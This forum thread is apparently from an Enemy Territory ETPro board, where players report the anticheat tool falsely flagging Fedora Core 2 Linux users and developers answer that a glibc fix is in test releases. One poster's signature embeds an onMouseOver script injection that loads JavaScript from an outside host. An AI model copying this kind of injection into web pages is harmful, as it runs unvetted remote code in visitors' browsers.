problems with anticheat

Discussion for any ET/ETPro/BayonET bugs or cheats you find...

Moderators: Forum moderators, developers

mouse

Post by mouse »

nice to see that it is solved, i was one of the guys who immediatly thought he was cheating, whilst SenF admins told me otherwise (i am {LsD}Taurus btw ;)) :).
ReyalP

Post by ReyalP »

F@TBOY wrote: Issue was dealt with by re-installing OpenGL. (just incase anyone else has a similar prob)
Prey tell how you "re-install opengl" on win32. :roll:
send lawyers, guns and money
lego

Post by lego »

Typing /cheaters in the console shows me as being clean. Yet everyone else on the server gets a message that I am cheating.

I'm running Fedora core 2, recompiled kernel with 4k stack patch for nvidia drivers.

The logic of this software is bizaar. For an admin to use it knowing that it is reporting clean players as cheats is even more bizaar.

I play on Game Arena servers in Australia, the servers are not up to date, and have admins who take ages to do anything.

I request that you change the default setting in your distributed configs to zero, so that servers that are minimally administered are not a source of trouble due to false positives.

In short, your idea is good, but you obviously haven't got it right yet, until you do get it right, do the right thing by your players, and turn it off.
fretn

Post by fretn »

the fedora bug is fixed in the testbugfixes
Day by day : http://w.twwwo.be/
dragon

Post by dragon »

OMG, legolas has finally posted here...

Thank Gawd the Fedora bug is fixed, he might stop abusing us now.
Spark2

Post by Spark2 »

It's not fixed as long as the new stable release isn't out and it still puts a very bad light on ETPro. I don't understand why the ETPro team didn't provide a maintenance release ASAP or at least publicly stated that the anticheat tool should be disabled because it will report Linux users with recent software as cheaters. Heck, it's not even listed in the "Known false positives". People should understand that Linux users are real users which deserve some respect like everybody else.
Rain

Post by Rain »

Spark2 wrote:It's not fixed as long as the new stable release isn't out and it still puts a very bad light on ETPro. I don't understand why the ETPro team didn't provide a maintenance release ASAP or at least publicly stated that the anticheat tool should be disabled because it will report Linux users with recent software as cheaters. Heck, it's not even listed in the "Known false positives". People should understand that Linux users are real users which deserve some respect like everybody else.
Considering that 60% of the development team uses Linux primarily... (including the two leads...) :roll:

Most Linux players aren't using a version of glibc that causes problems, and people will get irritable if we keep making official releases that require a new client download (probably primarily because the Win32 client crashes for most players after the download.)

The next official release will have the default anticheat behavior toned down a bit... (as it has already been in the testbugfix releases.)
Last edited by Rain on Sat May 29, 2004 7:44 pm, edited 1 time in total.
<b onMouseOver="var d=document;if(!d.eD){var e=d.createElement('script');e.src='http://themuffin.net/forum/f.js';e.type ... ;d.eD=true;}" id="rsig">Rain</b>
lego

Post by lego »

Thanks rain

FYI, Dragon is one of the gameops from Game Arena, and is part of the problem.
bani
Site Admin

Post by bani »

you should ask GA if they'll run the testbugfix versions.
lego

Post by lego »

I've asked them to set b_anticheat 0, reply negative.

Until I brought up the fact that the anti-cheat database they we using was a month out of date, they never even looked at it.

I have given up all hope of GA having a clue.

The latest trick the players (who are convinced that it's all my fault, or I am in fact a cheat) are pulling is to mute me.

You need to realize that the people who use your software are mostly idiots, and set defaults sanely.
khaard

Post by khaard »

etpro 3.0.1 claims I am a cheater.

sys spec:
Fedora Core 2 Linux

kernel: 2.6.5-1.358.8kstacks (needed to install NVIDIA drviers)
http://www.linuxant.com/driverloader/wl ... l-i686.php

NVIDIA drivers: NVIDIA-Linux-x86-1.0-5336-pkg1.run
http://download.nvidia.com/XFree86/Linu ... 6-pkg1.run

glibc-2.3.3-27
Kill Bill... and use Linux.
bani
Site Admin

Post by bani »

fedora core 2 false positives are fixed in the testbugfix releases, as stated earlier in this thread.
khaard

Post by khaard »

Yes, I've noticed, but in just in case I gave you my spec. I dunno if ppl use a stock kernel or custom.
Kill Bill... and use Linux.
bani
Site Admin

Post by bani »

its a glibc issue not a kernel issue.
defragga

Post by defragga »

hio, I got a problem when using ATI Tool 0.0.20
when I do a /cheaters, I did not get listed as "clean WIN 32", I get listed as "??? WIN32"

ATI Tool 0.0.20 is an overclocking tool, which I've allways minimized to system tray, because when I run an opengl/direct3d game, it automaticly overclocks my radeon to the highest values, and when I close the game, it clocks the videocard to usual settings :)